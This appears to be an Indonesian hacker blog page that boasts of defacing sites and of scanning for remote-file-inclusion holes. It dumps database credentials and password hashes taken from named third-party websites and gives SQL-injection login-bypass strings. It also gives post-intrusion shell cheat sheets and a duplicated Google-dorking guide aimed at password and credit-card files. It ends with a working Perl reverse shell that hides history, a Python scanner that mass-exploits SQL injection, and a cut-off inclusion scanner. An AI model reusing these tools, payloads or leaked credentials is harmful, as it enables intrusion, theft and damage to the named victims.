http://www.i-putra.com.my/sites/admin/detail.cfm?ID=2
DEFACE LAGI DEFACE LAGI

KETIMBANG NGANGGUR


HHEHEHEHEHE

linux commands in shell cat ./../mainfile.php - Config file. ls -la - Lists directory's. ifconfig {eth0 etc} - Ipconfig equiv. ps aux - Show running proccess's. gcc in_file -o out_file - Compile c file. cat /etc/passwd - List's accounts. sudo - Superuser Do run a command as root provided you have perms in /etc/sudoers. id - Tells you what user your logged in as. which wget curl w3m lynx - Check's to see what downloaders are present. uname -r - Shows all release info (or) cat /etc/release. uname -a - shows all kernal info (or) cat /etc/issue last -30 - Last logged 30 ip's can change to desired number. useradd - Create new user account. usermod - Modify user account. w - See who is currently logged on. locate password.txt - Locates password.txt in current dur can use *. rm -rf / - Please be carefull with this command, i cannot stress this enough. arp -a - Lists other machines are on the same subnet. lsattr -va - ls file attributes on linux second extended file system find / -type f -perm -04000 -ls - Finds suid files. find . -type f -perm -04000 -ls - Finds suid files in current dir. find / -type f -perm -02000 -ls - Finds all sgid files. find / -perm -2 -ls - Finds all writable files and folders. find . -perm -2 -ls - Finds all writable files and folders in current dir. find / -type f -name .bash_history - Finds bash history. netstat -an | grep -i listen - shows open ports. cut -d: -f1,2,3 /etc/passwd | grep :: - From memory creates a user with no pass. find /etc/ -type f -perm -o+w 2> /dev/null - Write in /etc/passwd?. cat /proc/version /proc/cpuinfo - Cpu info. locate gcc- Finds gcc if installed. set - Display system variables. echo $path- Echo current path. lsmod- Dumps kernal modules. mount/df- Check mounted file system. rpm -qa- Check patch level for RedHat 7.0. dmesg- Check hardware ino. cat /etc/syslog.conf - Log file. uptime - Uptime check. cat /proc/meminfo - Memory check. find / -type f -perm -4 -print 2> /dev/null- Find readble files. find / -type f -perm -2 -print 2> /dev/null - Find writable files. chmod ### $folder - Chmod folder. ls -l -b - Verbosly list directory's

Perintah2 Shell




ls -alfi : melihat daftar file di suatu direktori atau melihat atribut sebuah file
cat : melihat isi file
uname -a : melihat jenis OS serta versi
netstat -tnap : melihat koneksi keluar/masuk, atau listen
rm -rf : menghapus file atau direktori
cp : copy file
mv : mengganti nama file atau memindah file
echo : menampilkan kata yang dituliskan setelahnya
w : menampilkan user yang sedang login
whoami : menampilkan user kita sendiri
id : menampilkan user kita sendiri
mkdir : membuat direktori baru
touch : membuat file kosong
pwd : menampilkan irektori aktif
chown : mengganti kepemilikan file
chmod : mengganti atribut file
last : menampilkan daftar user-user yang pernah login
useradd : menambahkan user (root)
userdel : menghapus user (root)
usermod : memodifikasi user
passwd : mengganti password
su : ganti sebagai user lain
tar -zxvf : mengekstrak file tgz atau tar.gz
tar -czf : membuat file tgz
wget : mengambil suatu data dari suatu situs
lwp-download : mengambil suatu data dari suatu situs
curl : mengambil suatu data dari suatu situs
fetch : mengambil suatu data dari suatu situs (bsd)

LAN-hacking

Hack Any Network&Computer Without Sned Or Programme[Part2]

Hack Any Network&Computer Without Sned Or Programme[Part1]

Hack with tunneling

Exploit Hacking 2 - Privilege Escalation

Hacking dns server

PSP Hacking 101 - Ep 2 - Attack of the Firmware

Finally! The difference between PHP, ASP and other scripting languages.

Finally! The difference between PHP, ASP and other scripting languages.

PHP

PHP uses a blend of interpretation and compilation in order to provide the best mix of performance and flexibility to programmers.

Behind the scenes, PHP compiles your script down to a series of instructions (called opcodes) whenever it is accessed. These instructions are then executed one by one until the script terminates. This is different from conventional compiled languages such as C++ where the code is compiled down to native executable code then that executable is run from then on. Instead, PHP re-compiles your script each time it is requested.

This constant recompilation may seem a waste of processor time, but it is actually not all that bad because you no longer need to worry about hand recompiling your scripts when you make any changes. On the flip side, many scripts take longer to compile than they do to execute!

Furthermore, it provides very quick feedback during development. If you have an error somewhere in your file, PHP will refuse to compile the page until you have fixed the problem, and you are able to step through execution of your code line by line until you find the problem.

The speed hit of regular compilation is nullified entirely by the use of PHP accelerators.

One major advantage to having interpreted code is that all memory used by the script is managed by PHP, and the language automatically cleans up after every script has finished. This means that you do not need to worry about closing database links, freeing memory assigned to images, and so on, because PHP will do it for you. That is not to say you should be lazy and make PHP do all the work - good programmers clean up themselves, and let PHP work as backup in case something is missed.

Perl

Perl is the most popular of the PHP alternatives out there, arguably because it is also the oldest. There is a large installed base of Perl out there; many open-source projects require Perl to be installed to work properly. It has the advantages of being very (very!) flexible, and also having a large collection of modules already written for it. However, it is let down by the fact that it is very easy to write obfuscated and confusing Perl without really realising you are doing so, and this has resulted in such marvels as the annual Obfuscated Perl Contest.

Well-written Perl scripts often look fairly like their PHP equivalent. The major cause for Perl's messy appearance is that many Perl programmers rely on "one-liners" - packing large amounts of functionality into just one line of code. Perl was once described very accurately by its creator, Larry Wall, when he argued that the front cover for his O'Reilly book on Perl should be a camel, saying that Perl was ugly but serviceable, and able to go long distances without much nourishment.

Perl is often a better choice when you want to take advantage of some of the pre-written libraries. CPAN, Perl's library repository, is very big, and there is a huge range of code for you to take, customise, and re-use. Perl also has a very active - and very cool - hacker community around it that's a whole lot of fun to be part of and is really a bedrock of support when you need it. Larry Wall and Damian Conway (both core Perl developers) are both rightfully revered as "alpha geeks" - people who really push the envelope of programming by doing cool new things. They are both very friendly, and and attend many conferences year round - go ahead and introduce yourself if you meet them, because they really are fascinating to talk to.

ASP

Active Server Pages (ASP) and ASP.NET is Microsoft's attempt to succeed in the web development market, and comes as standard with their web server, IIS. ASP has been mauled by the open source community ever since it came out, and they gave a variety of reasons: it is proprietary, single platform (Windows), and slow.

I would like to say, "Yes, yes, and yes", but I'm not going to try to pull the wool over your eyes. The reality is that ASP has been implemented on other platforms, and, when running on Windows and Microsoft Internet Information Services (IIS), is actually lightning-fast.

That coupled with the fact that you can write add-on modules for ASP using Visual Basic and COM would make the whole solution very attractive indeed if it were not for the fact that ASP only really works well on IIS. On other platforms there are many fewer features, and it generally runs a great deal slower. When running on Windows, the security issues and licensing costs tends to be the most important thing, particularly when an all-Microsoft solution stack is being used.
and
ASP/ASP.NET is generally favoured when an all-Microsoft stack is in place. When used on Windows, it is very easy to deploy .NET code to ASP.NET pages or even write your ASP pages using C#.

ColdFusion

ColdFusion used to be quite popular back in the hey-days of the dot.com boom because it is developed using a proprietary IDE designed for novice programmers who have no wish to see source code of any complexity.

For such a wizard-oriented system, ColdFusion performs fairly well. Performance is nothing to be desired, but development speed is good. Perhaps ColdFusion's biggest let-down is the price tag - you will certainly need to sit down before you see it. ColdFusion was bought out by Macromedia, and this has served to boost its corporate appeal in places where open-source is still frowned upon.

The main drawback to using ColdFusion is arguably its user-friendliness, which might sound odd at first, but let me clarify. With PHP and Perl, because the languages are so flexible, you have much more control over what happens and why. If something goes wrong in your code, it's normally very easy to track it down and solve the problem, or change your plans and implement a different solution to the same problem. Very often, stock ColdFusion has just one way to solve a problem, and this greatly reduces your control over the solution you make. However, at the very least, you can work using ColdFusion when you are in team with non-technical people.

The biggest advantage to ColdFusion is its IDE and the language it uses, "CFML" (ColdFusion Markup Language) - even junior programmers can learn the system and start making pages quickly. As a result, you will often find ColdFusion in use at very large companies where they use Visual Basic (another easy, but not very powerful or fast language) for offline work.

JSP

Java Servlet Pages has often been considered the "dark horse" in web scripting because at first many thought it would be overkill for the job and yet has managed to get quite a substantial community about it nonetheless. JSP has three key advantages over some of its competitors, which may be why it has done so well:

1. It uses Java, a language that already has a large skill set of developers and a massive amount of functionality available. Java is also conducive to scalability as it distributes across multiple computers well.
   
2. Sun, as well as other members of the community, has worked hard to promote the language and tools that support it, which means that JSP has a lot of backing inside larger enterprises.
   
3. It strongly encourages templating of pages for maximum code re-use. Templates for PHP are widely available, but they are a great deal more popular in JSP.

It is a common argument that because JSP is based on Java it scales better than PHP. This is not correct per se in the same way that most other over-generalisations are not correct (yes, I realise that is an over-generalisation too, and hence you are free to enjoy the irony!) - PHP scales perfectly well as long as you write your PHP scripts usi andng the same design patterns you would have used writing your JSPs.

JSP is a popular choice when existing back-end business logic is written in Java also, as this keeps the development team language-homogenous.


From: http://www.hudzilla.org/phpbook/read.php/2_2_5

sekarang mah udah Online tiap hariii. bisa nongkrong lama-lama diinternet, Pasang DSL eeuy dirumah....dari pada bengong, langsung aja gw browsing ngeoprek-ngoprek file-file lama yang tercecer dimana-mana. heheheh bahasanya cuukkk....

langsung aja deh....gw sebenernya gw merasa ketinggalan sekali perkembangan dunia underground ya semacam security lah(bahasa berat kali boooooo).....abis lama gak pernah ONLINE...paling juga Online di YM aja...itu biasa buat mozok aja ngilangin stress...


langsung gw beraksi. eng ing eng......berubah superman xixixixi....sok mantap..
lama gak main shell

abis Nyecan pake RFI

lumayan deh dapet

!scan administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path= com_x-shop


$mosConfig_offline = '0';
$mosConfig_host = 'localhost';
$mosConfig_user = 'u_autoscan_d';
$mosConfig_password = '4u705c4n';
$mosConfig_db = 'autoscan_db';
$mosConfig_dbprefix = 'au_';
$mosConfig_lang = 'russian

http://autoscan.com.ua/administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=




Falfrir /neformat = ec7d56ebc5f82e6b922de0bdd1674d16

scanscop = bbd370eda96624f872fa068e195dbd54



DB_TYPE = "mssql";
$DB_HOST = "(local)";
$DB_NAME = "erl2";
$DB_USER = "erl2";
$DB_PASS = "erl2";
$DB_PREFIX = "Erl2_"

http://emis.erl.itri.org.tw:8080/erl2/



$mosConfig_editor = 'htmlarea2';
$mosConfig_offline = '0';
$mosConfig_host = 'localhost';
$mosConfig_user = 'admin';
$mosConfig_password = '2e2us0y2';
$mosConfig_db = 'mo_mswnl';
$mosConfig_dbprefix = 'mos_';


http://www.measurework.nl/mswnl/mambo4/administrator/

admin = c2e8571ba9f9342435385b37f4661506
Erik = b7c86bf6a26cdb6faa9a98bb6b6063a3

code BY pass SQL injecktion

pass:' union select * from tbluser where '1'='1
--------------------------------------------
user&pass : '<>'1
--------------------------------------------
user&pass : a'or'a'='a
--------------------------------------------
user : '<>1 and fldusername<>'
pass : '
--------------------------------------------
user&pass: ' and 1=1or '1'='1
--------------------------------------------
user : '+(select top 1 fldusername from tbluser)+'
pass : '+(select top 1 fldpassword from tbluser)+'
-------------------------------------------
user&pass: ' not in ('1') and '1'='1
-------------------------------------------
user&pass : 1'<'2
-------------------------------------------
user&pass : ' is not null and '1'='1
------------------------------------------
user :' oror ''='
pass:' oror ''='
------------------------------------------
user/pass :' oorr ''='

' or ' ,a'or'a'='a ,' oror ''='

Mengoptimalkan Penggunaan Search Engine
oleh fuhrer
Last Update : 10 Juli 2004

Internet adalah gudangnya dari informasi. Hampir semua hal yang berbentuk digital dapat kita temukan di sini. Di internet kita bisa mendapatkan berita yang serius sampai dengan obrolan tukang becak, software gratis sampai dengan yang paling mahal, file musik klasik sampai dengan Ikke Nurjanah. Tidak ada batasnya.

Di dunia underground, internet disalahgunakan untuk kegiatan-kegiatan illegal. Dari hacking, carding sampai dengan bajak-membajak software sudah tidak asing lagi.

Tapi untuk menemukan kebutuhan kita secara spesifik tidak selalu mudah, seperti mencari jarum dalam sekam, kecuali Anda bisa menggunakan search engine dengan efektif.

Saat ini Google (http://www.google.com) masih menjadi search engine yang paling handal, karena bisa menjangkau daerah-daerah yang bahkan seharusnya restricted. Begitu hebatnya Google, sampai-sampai kegiatan searching di internet disebut dengan googling.

Kali ini saya akan mengajak sodara-sodara sebangsa dan setanah air untuk belajar bersama-sama cara menggunakan Google dengan optimal.

Menggunakan Boolean

Bagi Anda yang pernah belajar programming tentu sudah mengerti apa itu boolean. Boolean dalam bahasa Indonesia mungkin mirip artinya dengan logika. Google mengenal beberapa tanda boolean, antara lain :

1. tanda “+” atau AND
2. tanda “–“ atau NOT
3. OR

Tanda “+”
Tanda “+” (plus) atau “AND” digunakan untuk mencari informasi di internet yang mengandung dua kata atau lebih yang kita tentukan, misalnya :
wallpaper + free + download
Hasil pencarian Google adalah halaman-halaman web di mana setiap halaman mempunyai tiga kata tersebut. Jika suatu halaman web hanya memiliki salah satunya saja maka tidak akan ditampilkan oleh Google.

Tanda “-”
Jika Anda menginginkan informasi tentang sepeda motor tapi Anda tidak ingin informasi tersebut berhubungan dengan Honda, Anda dapat menuliskan :
sepeda + motor – honda
Hasil yang sama akan didapatkan dengan menuliskan :
sepeda + motor NOT honda
(kata NOT tidak harus ditulis dengan huruf besar).

Tanda “OR”
Hasil pencarian Google untuk dua kata atau lebih yang dihubungkan dengan tanda “OR” sama dengan jika kata-kata tersebut dipisahkan oleh spasi. Misalnya Anda mengingikankan informasi tentang kegiatan hacking atau carding di Indonesia, Anda dapat menuliskan :
indonesia + hacking OR carding.

Pencarian Frase
Yang dimaksud frase adalah kumpulan dua kata atau lebih. Pencarian frase tertentu menggunakan Google dapat dituliskan dengan menuliskan frase tersebut di antara tanda petik ( “ ), contoh :
“Introduction to SQL Injection”.
Dengan kata kunci tersebut, Google akan memberikan dokumen-dokumen yang persis memuat frase tersebut. Contoh yang lain :
“Seventh son of seventh son”.
Dengan frase tersebut, kemungkinan besar Google akan memberikan hasil lirik lagu Iron Maiden. Pencarian dengan frase ini hasilnya sangat tajam, pastikan Anda menguasainya.

OK, teknik searching di atas adalah dasar dari teknik-teknik pencarian informasi di internet. Walaupun diasumsikan kita menggunakan Google, sebenarnya teknik-teknik tersebut dapat digunakan pada hampir semua search engine. Selanjutnya kita akan menginjak teknik-teknik yang lebih mengasyikkan, dan hanya Google yang bisa melakukannya. Yeah, Google is the best.

Mencari Directory Index
Jika suatu folder atau directory tidak mengandung file index (index.html, index.htm, index.php atau index.asp), maka akan ditampilkan daftar file yang ada di folder atau directory tersebut, dan judul atau title dari halaman yang tampil tersebut akan menjadi “Index of /nama_folder”.

Misalnya kita ingin mencari file mp3, maka kita dapat masukkan kata kunci :
“index of” + mp3
“index of” + mp3s
(ingat pelajaran Bahasa Inggris saat kita SMP, mp3s adalah kata jamak dari mp3)
“index of” + mp3 + metallica
“index of” + mp3 + rock

Contoh yang lain, misalnya kita ingin mencari database dari sebuah online shop yang, siapa tahu, ada informasi tentang credit card :
“index of” + mdb
“index of” + shop + mdb
“index of” + order
“index of” + orders + mdb
“index of” + “cgi-bin” + order

Menggunakan kata bantu filetype
Dengan menggunakan kata bantu filetype, kita dapat mempertajam pencarian file dengan ekstensi tertentu, misal :
filetype:doc
filetype:mdb
filetype:pdf

Menggunakan kata bantu site
Kata bantu site berguna untuk pencarian situs dengan domain tertentu, misalnya kita mencari file MS Word di situs militer, maka ditulis :
filetype:doc site:.mil

Contoh yang lain :
“index of” + password site:.ac.id
“login.asp” site:.go.au

Menggunakan kata bantu inurl
Kata bantu inurl digunakan untuk menemukan situs yang memiliki url tertentu, misalnya :
inurl: wwwboard/passwd.txt
Pencarian dari kata tersebut akan menghasilkan kurang lebih 139 links, yang masing-masing akan menampilan string yang ada di file passwd.txt. Oh, ya wwwBoard adalah message board berbasis CGI yang secara default menyimpan passwordnya pada file passwd.txt dengan format username:password.

Menggunakan kata bantu intitle
Seperti kita tahu bahwa setiap halaman web memiliki judul atau title. Kata bantu intitle berfungsi mencari dokumen spesifik yang mempunyai judul atau title yang kita tentukan, misalnya :
intitle:"index of" htpasswd
intitle:"admin login”
intitle:"restricted”

Contoh Aplikasi

Berikut ini contoh-contoh nakal dari pemanfaatan Google :
“index of” + admin
“index of” + members
“index of” + account + mdb
“index of” + “accounts.mdb”
inurl:”admin/password.txt”
inurl:”admin/order.txt”
inurl:”shop/orders.log”
inurl:iisadmin
“index of” + “showcode.asp”
“index of” + “EIPC.mdb”
“index of” + “shop.mdb”

baca selengkapnya

www.johnny.ihackstuff.com

Mengoptimalkan Penggunaan Search Engine
oleh fuhrer
Last Update : 10 Juli 2004

Internet adalah gudangnya dari informasi. Hampir semua hal yang berbentuk digital dapat kita temukan di sini. Di internet kita bisa mendapatkan berita yang serius sampai dengan obrolan tukang becak, software gratis sampai dengan yang paling mahal, file musik klasik sampai dengan Ikke Nurjanah. Tidak ada batasnya.

Di dunia underground, internet disalahgunakan untuk kegiatan-kegiatan illegal. Dari hacking, carding sampai dengan bajak-membajak software sudah tidak asing lagi.

Tapi untuk menemukan kebutuhan kita secara spesifik tidak selalu mudah, seperti mencari jarum dalam sekam, kecuali Anda bisa menggunakan search engine dengan efektif.

Saat ini Google (http://www.google.com) masih menjadi search engine yang paling handal, karena bisa menjangkau daerah-daerah yang bahkan seharusnya restricted. Begitu hebatnya Google, sampai-sampai kegiatan searching di internet disebut dengan googling.

Kali ini saya akan mengajak sodara-sodara sebangsa dan setanah air untuk belajar bersama-sama cara menggunakan Google dengan optimal.

Menggunakan Boolean

Bagi Anda yang pernah belajar programming tentu sudah mengerti apa itu boolean. Boolean dalam bahasa Indonesia mungkin mirip artinya dengan logika. Google mengenal beberapa tanda boolean, antara lain :

1. tanda “+” atau AND
2. tanda “–“ atau NOT
3. OR

Tanda “+”
Tanda “+” (plus) atau “AND” digunakan untuk mencari informasi di internet yang mengandung dua kata atau lebih yang kita tentukan, misalnya :
wallpaper + free + download
Hasil pencarian Google adalah halaman-halaman web di mana setiap halaman mempunyai tiga kata tersebut. Jika suatu halaman web hanya memiliki salah satunya saja maka tidak akan ditampilkan oleh Google.

Tanda “-”
Jika Anda menginginkan informasi tentang sepeda motor tapi Anda tidak ingin informasi tersebut berhubungan dengan Honda, Anda dapat menuliskan :
sepeda + motor – honda
Hasil yang sama akan didapatkan dengan menuliskan :
sepeda + motor NOT honda
(kata NOT tidak harus ditulis dengan huruf besar).

Tanda “OR”
Hasil pencarian Google untuk dua kata atau lebih yang dihubungkan dengan tanda “OR” sama dengan jika kata-kata tersebut dipisahkan oleh spasi. Misalnya Anda mengingikankan informasi tentang kegiatan hacking atau carding di Indonesia, Anda dapat menuliskan :
indonesia + hacking OR carding.

Pencarian Frase
Yang dimaksud frase adalah kumpulan dua kata atau lebih. Pencarian frase tertentu menggunakan Google dapat dituliskan dengan menuliskan frase tersebut di antara tanda petik ( “ ), contoh :
“Introduction to SQL Injection”.
Dengan kata kunci tersebut, Google akan memberikan dokumen-dokumen yang persis memuat frase tersebut. Contoh yang lain :
“Seventh son of seventh son”.
Dengan frase tersebut, kemungkinan besar Google akan memberikan hasil lirik lagu Iron Maiden. Pencarian dengan frase ini hasilnya sangat tajam, pastikan Anda menguasainya.

OK, teknik searching di atas adalah dasar dari teknik-teknik pencarian informasi di internet. Walaupun diasumsikan kita menggunakan Google, sebenarnya teknik-teknik tersebut dapat digunakan pada hampir semua search engine. Selanjutnya kita akan menginjak teknik-teknik yang lebih mengasyikkan, dan hanya Google yang bisa melakukannya. Yeah, Google is the best.

Mencari Directory Index
Jika suatu folder atau directory tidak mengandung file index (index.html, index.htm, index.php atau index.asp), maka akan ditampilkan daftar file yang ada di folder atau directory tersebut, dan judul atau title dari halaman yang tampil tersebut akan menjadi “Index of /nama_folder”.

Misalnya kita ingin mencari file mp3, maka kita dapat masukkan kata kunci :
“index of” + mp3
“index of” + mp3s
(ingat pelajaran Bahasa Inggris saat kita SMP, mp3s adalah kata jamak dari mp3)
“index of” + mp3 + metallica
“index of” + mp3 + rock

Contoh yang lain, misalnya kita ingin mencari database dari sebuah online shop yang, siapa tahu, ada informasi tentang credit card :
“index of” + mdb
“index of” + shop + mdb
“index of” + order
“index of” + orders + mdb
“index of” + “cgi-bin” + order

Menggunakan kata bantu filetype
Dengan menggunakan kata bantu filetype, kita dapat mempertajam pencarian file dengan ekstensi tertentu, misal :
filetype:doc
filetype:mdb
filetype:pdf

Menggunakan kata bantu site
Kata bantu site berguna untuk pencarian situs dengan domain tertentu, misalnya kita mencari file MS Word di situs militer, maka ditulis :
filetype:doc site:.mil

Contoh yang lain :
“index of” + password site:.ac.id
“login.asp” site:.go.au

Menggunakan kata bantu inurl
Kata bantu inurl digunakan untuk menemukan situs yang memiliki url tertentu, misalnya :
inurl: wwwboard/passwd.txt
Pencarian dari kata tersebut akan menghasilkan kurang lebih 139 links, yang masing-masing akan menampilan string yang ada di file passwd.txt. Oh, ya wwwBoard adalah message board berbasis CGI yang secara default menyimpan passwordnya pada file passwd.txt dengan format username:password.

Menggunakan kata bantu intitle
Seperti kita tahu bahwa setiap halaman web memiliki judul atau title. Kata bantu intitle berfungsi mencari dokumen spesifik yang mempunyai judul atau title yang kita tentukan, misalnya :
intitle:"index of" htpasswd
intitle:"admin login”
intitle:"restricted”

Contoh Aplikasi

Berikut ini contoh-contoh nakal dari pemanfaatan Google :
“index of” + admin
“index of” + members
“index of” + account + mdb
“index of” + “accounts.mdb”
inurl:”admin/password.txt”
inurl:”admin/order.txt”
inurl:”shop/orders.log”
inurl:iisadmin
“index of” + “showcode.asp”
“index of” + “EIPC.mdb”
“index of” + “shop.mdb”

baca selengkapnya

www.johnny.ihackstuff.com

[Perl] Connect Back Shell





#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

[python] SQL Scanner v1.0





#!/usr/bin/python
#SQL Scanner that will collect hosts using a google query. Will add the
#injection code to each host and search for md5 in the source.

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import sys, urllib2, re, sets, time, socket, httplib

def title():
print "\n\t d3hydr8[at]gmail[dot]com SQL Scanner v1.0"
print "\t-----------------------------------------------"

def usage():
title()
print "\n Usage: python SQLscan.py \n"
print "\n Example: python SQLscan.py -g inurl:'.gov' 200 -s '/index.php?offset=-1/**/UNION/**/SELECT/**/1,2,concat(password)/**/FROM/**/TABLE/*' -write sql_found.txt -v\n"
print "\t[options]"
print "\t -g/-google : Searches google for hosts"
print "\t -s/-sql : Vuln. file plux sql injection"
print "\t -w/-write : Writes potential SQL found to file"
print "\t -v/-verbose : Verbose Mode\n"

def StripTags(text):
finished = 0
while not finished:
finished = 1
start = text.find("<")
if start >= 0:
stop = text[start:].find(">")
if stop >= 0:
text = text[:start] + text[start+stop+1:]
finished = 0
return text

def timer():
now = time.localtime(time.time())
return time.asctime(now)

def geturls(query):

counter = 10
urls = []
while counter < int(num):
url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
data = opener.open(url).read()
hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
#Lets add sites found to a list if not already or a google site.
#We don't want to upset the people that got our list for us.
for x in hosts:
if x.find('www') != -1:
x = x[x.find('www'):]
if x not in urls and re.search("google", x) == None:
urls.append(x)
counter += 10
return urls

def tester(victim):

if victim[:7] != "http://":
victim = "http://"+victim.rsplit("/",1)[0]+sql
if verbose ==1:
print "Testing:",victim
try:
source = urllib2.urlopen(victim.rsplit("/",1)[0]+sql, "80").read()
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >= 1:
md5s = list(sets.Set(md5s))
print "\n[!] MD5 Found:",''.join([str(i) for i in victim.split("/",3)[:3]])[5:]
for md5 in md5s:
print "\t[",md5,"]\n"
found_sql.append(victim)
except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine):
pass
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
except():
pass

if len(sys.argv) < 6:
usage()
sys.exit(1)

for arg in sys.argv[1:]:
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
if arg.lower() == "-w" or arg.lower() == "-write":
txt = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-s" or arg.lower() == "-sql":
sql = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-g" or arg.lower() == "-google":
query = sys.argv[int(sys.argv[1:].index(arg))+2]
num = sys.argv[int(sys.argv[1:].index(arg))+3]
title()
socket.setdefaulttimeout(10)
found_sql = []
count = 0
print "\n[+] SQL_scan Loaded"
try:
if verbose ==1:
print "[+] Verbose Mode On"
except(NameError):
verbose = 0
print "[-] Verbose Mode Off"
if sql[:1] != "/":
sql = "/"+sql
print "[+] SQL:",sql
try:
if txt:
print "[+] File:",txt
except(NameError):
txt = None
pass
try:
if num.isdigit() == False:
print "\n[-] Argument [",num,"] must be a number.\n"
sys.exit(1)
else:
if int(num) <= 10:
print "\n[-] Argument [",num,"] must be greater than 10.\n"
sys.exit(1)
except(IndexError):
print "\n[-] Need number of hosts to collect.\n"
sys.exit(1)
query = re.sub("\s","+",query)
print "[+] Query:",query
print "[+] Number:",num
print "[+] Querying Google..."
urls = geturls(query)
print "[+] Collected:",len(urls),"hosts"
print "[+] Started:",timer()
print "[+] Scanning hosts..."
print "\n[-] Cancel: Press Ctrl-C"
for url in urls:
tester(url)
time.sleep(3)
print "-"*65
print "\n\n[+] Potential SQL found:",len(found_sql),"\n"
time.sleep(3)
if txt != None and len(found_sql) >=1:
sql_file = open(txt, "a")
sql_file.writelines("\n\td3hydr8[at]gmail[dot]com SQL Scanner v1.0\n")
sql_file.writelines("\t------------------------------------------\n\n")
print "[+] Writing Data:",txt
else:
print "[-] No data written to disk"
for k in found_sql:
count+=1
if txt != None:
sql_file.writelines("["+str(count)+"] "+k+"\n")
print "\n["+str(count)+"]",k
print "\n[-] Done -",timer(),"\n"

[PERL] Inclusion Scanner







#!/usr/bin/perl -w

unlink("results.html");
print "\n \n#Will check a directory for all includes and unsets \n";
print "#Coded by Ironfist (ironsecurity.nl) \n";
print "#Usage: create a folder in your perlfolder and put the files to be scanned in it, next type the folder name below (eg myfolder) \n";
print "#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM :) \n\n\n";


print "Directory to read? ";
$input = ;
chop ($input);

@files = <$input/*>;

foreach $file (@files) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files2 = <$input/*/*>;
foreach $file (@files2) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files3 = <$input/*/*/*>;
foreach $file (@files3) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files4 = <$input/*/*/*/*>;
foreach $file (@files4) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
